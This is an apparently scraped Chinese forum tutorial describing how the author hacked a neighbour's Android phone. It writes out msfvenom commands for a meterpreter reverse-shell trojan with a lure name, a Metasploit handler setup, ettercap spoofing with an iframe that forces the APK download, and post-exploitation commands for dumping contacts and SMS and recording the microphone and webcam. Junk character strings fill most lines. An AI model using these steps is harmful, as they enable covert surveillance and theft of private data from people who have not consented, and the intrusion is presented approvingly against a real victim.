|
# H+ g' a) k; X
五、msf+ettercap入侵邻居安卓手机 # o+ X- @9 A. |. G! i' F
) l% \( {7 k8 X" E7 A9 W, ^! f
. {6 E* f- ~7 s
首先启动msf [% T8 R* V$ I% L
" f+ g! T' C) H+ p! B/ [: C5 i# j8 X/ w4 V
先用kali生成一个安卓木马,如下命令:
' r4 Y5 X8 @3 R% z9 O/ w
# P* a7 \* D- Q2 ?, @
2 S0 ~) p! w v. m6 w' [ Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
5 i( C$ @5 s, F. F+ H; d . N5 c' C9 g! X0 Q: k
- x, r1 d" B5 G$ u 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 ; w% H, Q ]7 E2 q: K5 H
, b+ A7 c4 n0 Y% f' d" l
/ {: F+ ~( k9 h- V" d9 X 然后进入msf , Q5 _2 X$ [$ D: Y
8 P9 E8 ~8 v- x
& u! u0 j: ?) n
use exploit/multi/handler 6 @, v; C* H9 W! k3 {' [% y8 ~
+ G" q0 d: w# B o+ |
0 r3 ]7 Z* J% s5 R set payload android/meterpreter/reverse_tcp
! w6 V2 B/ k( f5 y" R # D- b0 d3 z6 A8 @
7 y. U$ w5 @2 i e set LHOST 192.168.0.109 //ip为kaili的ip " c% E6 `) _; k8 H9 L! Y: @
0 V* k8 @2 e T m" z& h
# a. J, X2 z2 Y6 ?7 X1 C# r set LPORT 44444 //端口一定要与前面生成的木马的端口一致 $ A+ w+ o% x" t" v
9 e# k3 d# c, L( n# G6 U3 o
9 _1 t! x+ b' G( \" p! H( a) i Exploit
9 _( X0 r8 p U5 v2 `
5 s* C+ x6 H; y3 T) \/ u& j( [" J
: K1 _/ b; L7 w8 A6 c# M# L+ |, M
|( |+ |3 o9 L1 L+ V
4 a6 G" r3 h( |0 M5 m3 M6 c% K
# t7 o' I( g, Z, F 下面我们开启ettercap -G
# b: f6 ^1 p0 a! Q- [$ M$ r% Q
- p0 r P6 A5 Z6 t9 z$ H' H' q+ k! l5 ~. V& _8 W) Z, D
我物理IP为 5 S B& B3 i) s
+ I6 {' D; P, _) @3 E4 B5 P; n& u6 k
% G+ w9 v. K# B0 Y$ V% \! X : K* i2 o% ?1 R$ W9 T' X8 G/ f
6 `1 ? b% P+ n0 z( [4 V" A$ l* Y6 f
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ) W0 }! Y" i' {! i$ t
' W' |1 E1 x: O t0 F# m# k
6 b0 n5 d/ n) { 下面我们来设置一下 - o: B8 ?( G( ]1 I J
2 k7 h4 z6 n; x. C9 E( J
5 K7 \8 S7 L1 f+ Z2 f2 z3 f I" P3 \
5 W4 T8 G- u8 X* ]% {: `
# O7 k y j2 e2 N) C" n5 Z4 G
P+ P( ~+ C. f8 {- x, D 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
( ?; Y* r7 H" J6 d7 M0 E+ t r
. o4 l( \" e* d+ J% X' w1 k8 n
# C0 g$ W6 j9 U( ^1 g. x4 z2 W: j: m r 4 c6 F1 ?; [; B# R3 p
5 e) k+ O1 L' _: ^* ]
3 Z& X) a5 V( d3 D3 M # S$ e/ t$ V/ d, d! \7 ^6 j
. H) I7 i$ s' a- t' \9 \7 o i
8 y' L+ }' k o5 T! S2 d 0 f. p( I; N/ e, |; X
( W: {9 M8 [& p$ r
8 R$ D# ~, |5 `$ @% S( C, a
, K+ H; C) `! B* P: f0 M3 ~% V 9 p0 o' j1 Z( t$ Q) |$ u, j& ~4 T! Z
: d1 B* m ]" @2 v" g: v
9 H( m( F$ h! z6 L5 q' c$ e2 v . d( H' _3 b1 u# `( V
% t; D M- S8 | # g- ^3 U/ W# C/ F3 D; j# e& [3 _
4 Q' q4 }, Z b9 L i# F& f4 w
( b o" ]& n: t7 h+ K" w. t. ]
+ O) h) q- Z ?' |% {- w2 x4 e
1 D1 Q+ Z7 O& Q* h/ W# e( Q8 y6 n7 V7 L. c X' N6 p8 |6 M
+ Z" d2 J0 G. g7 z! E/ r
$ s* N+ T# V4 m% @2 E
. }" g; P/ A |( o3 }" `0 \3 {* n $ t1 T" R- I3 v( F# ]
+ @% d; W; b# C+ r
- \& ^) t! h8 f
6 r) o: \, O% q/ l
% \/ ^& S" L5 O1 S% q6 x# l0 i
; l3 i' H, u! U1 ]! \" @ ?2 j: O. n
9 R3 J, X: c7 x# U. G8 g# Z* H
# r: m2 c/ p1 b& k4 q
1 B3 Y2 a% N) E1 ^1 {2 @
, U, X# L m, J! H( }: A4 F) \
5 l: K; t/ I; j9 S T. ?2 l9 M6 Z# v1 t! C+ ?
( e o* ?& q1 x4 B* S6 Q# |* P
/ x* e" F; b9 }2 c
' `! x2 U5 Z- d( P/ \5 Z0 M1 |& `
下面我们开始攻击
: a6 O5 Y% g* E9 C4 O; o % r( W/ V5 Q5 k
! i) Q' b# `* M$ r: O
! Z1 V4 @0 ~: L7 q P
. s2 [& ~, c+ s3 ^1 S7 W& s! w+ P* t* s; \2 {# k8 ~
; v% ^" Q* l& {1 p7 [: T
; J4 Q- E+ @1 G+ Q' Q+ s
2 G0 L+ Y: u- v- a; K
+ n6 b* c* X Y2 d4 Z 0 Y% @+ {6 e( k2 y& a
! f" o0 H& a% J }3 F1 ]
$ ]' O/ @. h1 H3 Y) p9 B ; s( y! l P$ [: E' m
9 A3 D; q# ]2 b3 O4 g; h1 L
' S0 n8 s8 K- k' z7 ^2 ^
) ~. h+ A9 w- J0 i, p- @
1 z0 J$ M. G& G3 n! I+ { 大概过了5分钟多,发现反弹成功了
6 S/ M! l! }. m! Z A 5 C% }0 A4 l2 e- L y$ R
3 U: f- y: N! Z6 f, b6 K; o+ {( ^' |; X8 V
( E7 v! f8 `) [ i, C. r
* ?7 r: `) g$ C, ]8 v- D
$ \6 b& v8 }3 K8 S' q2 X% ^
7 l6 `2 s+ s% F$ ]% F
& s+ \+ N4 s; r3 v4 m1 o: [4 }- S- S; H9 r
+ F( S$ C5 f+ |6 O
9 E. h8 f& {/ [/ P
: Q- Z2 E# J0 h" Y
# A# s- p& A8 u7 N4 g: h: } + l. M7 c8 D: s ~4 V
/ ~4 L# ~* {4 @4 S3 k
8 ]8 `2 Q: A( R/ o% i
6 y; i* B/ L# ]" C6 x$ |8 Z. N% Q$ H+ o- e
1 P' ]) E7 Q) `# [3 U% B , n) {& _( a7 j* c/ @
3 i: d9 D9 g4 z1 Q4 t
5 Z0 o( Y5 N1 B! {0 Z. |5 v
7 w& y* t0 i3 q* V2 ^$ T
^$ \0 M& @. E. q/ v( c% ]% k& ^
执行命令
- Y% k; ]! Z. }( B, a
; r7 M: _1 I- t5 C6 }7 y {' Z: E& j. B
2 R* |1 d% U& A; R
' B; ?( o+ d0 v: x8 B) G( p, O
n* B( \: [# D9 q# z2 ^$ h dump_contacts --》这个是导出电话 & k, H3 ~( O# w5 D$ k9 Z7 P$ E
( Q% W6 U4 Q7 m- |0 ^- } T/ c- h* W7 z: e
dump_sms --》这个是导出信息 & \% s& ?. j% L# }
* H/ y* `# J: u! R( O. f) p% K1 K8 d7 l4 Z: t, Z" e# M
record_mic Record audio from the default microphone for X seconds 3 K+ y& [* M/ m" Q5 s7 u
8 n$ H3 n8 U- |
, y9 o# ]3 I* J( d2 V webcam_chat Start a video chat
( n2 l* P5 N) S& | & N) H# f3 C. Q2 R3 H8 [" t. ~$ |
$ ?$ o& t7 B: A) K5 v$ ^ webcam_list List webcams
. z% a. W& L# ^1 S 6 d" O9 h9 I8 Q, S1 B8 ~. ^6 t
! j9 p5 Z3 W- I4 J6 t! H2 b B webcam_snap Take a snapshot from the specified webcam
+ L4 q/ r; A% ?7 \5 a ' X% `8 ~# G: z* D- q$ X/ W( p+ d
% b! N1 A/ ?% E! T4 x7 W5 g webcam_stream   lay a video stream from the specified webcam 2 j R( I9 i* R2 L. W* ~) j( q, P
- p8 M/ b/ J2 F. G
8 d7 G0 {) p8 [# w
) ]- @9 |" U6 C) w8 y 0 I h w8 D4 k/ B( Y
8 a( h/ ~0 [, D; r- h
5 H+ W3 ~0 ^+ |# C1 o
! j" v. ~7 Y+ K m8 j- H$ r+ B% y* H1 N0 r! f2 I! W3 ~2 d
我们打开看一下电话薄,
6 E$ `9 D: e+ ?$ {6 C
. v! P% n- z& T, D: D C+ F6 j' e4 p: _8 Z
0 T& q' o7 _* l( z1 w/ Y
% @ X5 y0 H, ]+ n1 D
" b: q1 Z# g$ r0 }' O0 G m
( x# z# K5 _) `3 {7 d4 B, \ 7 E% i3 B0 s# `- g. j& O+ D6 t( _
0 W& j; Y g8 b- C. P) S
( M8 C' O H7 R7 Q! X
9 y) L0 T. w1 k5 n' G+ R
0 |" c+ O4 |6 _- B$ s6 k2 Q: i% s
1 U6 b5 m; c% h
( s9 {- R% }( B8 g6 K3 z6 f- ~6 {' c9 H: ~- Y7 z1 _
- D0 N- |: \/ z" @+ R" {8 l
6 J3 Z) C% y1 Q0 B& o7 w7 Q* @* a! u& k" `4 ?. f
+ A, t0 }5 C: i7 m: t- P( {* e
, p# Y' a3 x% l8 r; s: I" H8 z/ N& B" U6 ^- v
我们同时欺骗成DroidJack木马,使用方法如图:
3 `$ p) |8 p: \6 ?0 p" Y
! A# K) u: `- K$ d e9 A5 m9 J
4 U& f6 M. S% H6 N/ p. J( F+ s 3 l" e: i& Z- N U4 k; @
, |( @ K3 b6 I) l8 H" i9 \
% d" u8 N; S: }+ e: D1 J( i
! x7 p. H" t9 Q2 }
|9 t; T( P6 u6 o+ [
+ a+ A- s! x$ |; u% A - t* H) S; A( p- e
- c- _) u5 M+ C9 M9 h8 G1 B% l$ q: s( f! f+ p
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 1 V, {% {' h& y- l
; }, `8 V+ F! R1 K
( J t) _* x% H
' l& M0 V: f3 | H9 d m: K r 8 v8 L+ [7 S, ]) A5 W+ H
8 P3 c4 C' @4 ]4 z" E ) R# B; u m9 S
* P( V6 m! j0 a- Y6 G
6 `% ]+ ?1 F# X4 ^2 N& V9 _( X2 ^
3 Y: N! i3 D) J: X: }/ n' ?) A
) P B: a) j7 v! j* x o! m7 R1 H L# @1 d0 c* v1 l$ c9 P
 " w) \% ~8 Z: J1 X' u' c1 d0 K% [
$ S( o: Z0 H: F/ d) a# n! f+ J9 r* p4 o( y( P. J% a2 I. j
2 k6 i9 z7 y1 @+ {: Y. \
|